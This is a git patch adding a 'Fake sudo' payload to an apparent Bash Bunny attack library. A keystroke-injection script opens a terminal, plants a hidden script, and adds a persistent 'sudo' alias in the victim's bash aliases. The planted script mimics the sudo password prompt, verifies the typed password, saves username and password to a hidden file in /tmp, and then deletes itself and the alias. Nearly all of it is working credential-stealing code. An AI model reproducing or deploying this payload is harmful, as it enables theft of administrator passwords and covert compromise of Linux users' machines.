From dfe52e6a5c0c4131d1b2ac79f30fe0be51d3d001 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Thu, 12 May 2022 11:26:34 -0400
Subject: [PATCH] Add "Fake sudo" (#522)
* Add "Fake sudo"
1) Copies the "sudo" command spoofing program to the user's home directory.
2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
- __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
- __But__ this behavior can be changed in line 21 of the "sudo-phishing.sh" file.
4) After sending, the spoofing program deletes the "sudo" alias. Then it deletes itself.
* Update README.md
* Update sudo-phishing.sh
---
payloads/library/phishing/fake-sudo/README.md | 48 +++++++++++
.../library/phishing/fake-sudo/payload.txt | 86 +++++++++++++++++++
.../phishing/fake-sudo/sudo-phishing.sh | 41 +++++++++
3 files changed, 175 insertions(+)
create mode 100644 payloads/library/phishing/fake-sudo/README.md
create mode 100644 payloads/library/phishing/fake-sudo/payload.txt
create mode 100644 payloads/library/phishing/fake-sudo/sudo-phishing.sh
diff --git a/payloads/library/phishing/fake-sudo/README.md b/payloads/library/phishing/fake-sudo/README.md
new file mode 100644
index 00000000..dfe8c791
--- /dev/null
+++ b/payloads/library/phishing/fake-sudo/README.md
@@ -0,0 +1,48 @@
+# Fake sudo
+
+- Title: Fake sudo
+- Author: TW-D
+- Version: 1.0
+- Target: Linux
+- Category: Phishing
+
+## Description
+
+1) Copies the "sudo" command spoofing program to the user's home directory.
+2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
+3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
+- __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
+- __But__ this behavior can be changed in line 21 of the "sudo-phishing.sh" file.
+4) The spoofing program deletes the "sudo" alias. Then it deletes itself.
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+```
+
+From "sudo-phishing.sh" change the values of the following constants if necessary :
+```bash
+
+readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+readonly MAXIMUM_ATTEMPTS=3
+readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
+
+```
+
+From "sudo-phishing.sh", change the payload if you wish :
+```bash
+##
+#
+##
+/usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+##
+#
+##
+```
+
diff --git a/payloads/library/phishing/fake-sudo/payload.txt b/payloads/library/phishing/fake-sudo/payload.txt
new file mode 100644
index 00000000..a9bb2d1d
--- /dev/null
+++ b/payloads/library/phishing/fake-sudo/payload.txt
@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title: Fake-sudo
+#
+# Description:
+# This program creates a fake "sudo"
+# command by defining an persistent alias.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Phishing
+# Target: Linux
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.4 LTS x86_64 (Xfce)
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+Q CTRL-ALT t
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " cp ./sudo-phishing.sh ~/.sudo_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING " chmod +x ~/.sudo_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " printf \"\\nalias sudo='~/.sudo_phishing.sh'\\n\" >> ~/.bash_aliases"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING " exit"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
\ No newline at end of file
diff --git a/payloads/library/phishing/fake-sudo/sudo-phishing.sh b/payloads/library/phishing/fake-sudo/sudo-phishing.sh
new file mode 100644
index 00000000..bd489f74
--- /dev/null
+++ b/payloads/library/phishing/fake-sudo/sudo-phishing.sh
@@ -0,0 +1,41 @@
+#!/bin/bash
+#
+# Fake-sudo
+#
+# This program imitates the behavior
+# of the "sudo" command.
+#
+
+readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+readonly MAXIMUM_ATTEMPTS=3
+readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
+
+attempts() {
+ /usr/bin/echo -n "${INPUT_MESSAGE}"
+ read -r -s sudo_password
+ /usr/bin/echo ""
+ if /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S /usr/bin/true 2> /dev/null; then
+ ##
+ #
+ ##
+ /usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+ ##
+ #
+ ##
+ /usr/bin/rm ~/.sudo_phishing.sh
+ /usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak
+ /usr/bin/mv ~/.bash_aliases_bak ~/.bash_aliases
+ /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
+ $BASH
+ exit 0
+ fi
+}
+
+if (/usr/bin/sudo -n /usr/bin/true 2> /dev/null) || [ "${#}" -eq 0 ]; then
+ /usr/bin/sudo "${@}"
+else
+ for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
+ attempts "${@}"
+ done
+ /usr/bin/echo "${ERROR_MESSAGE}"
+fi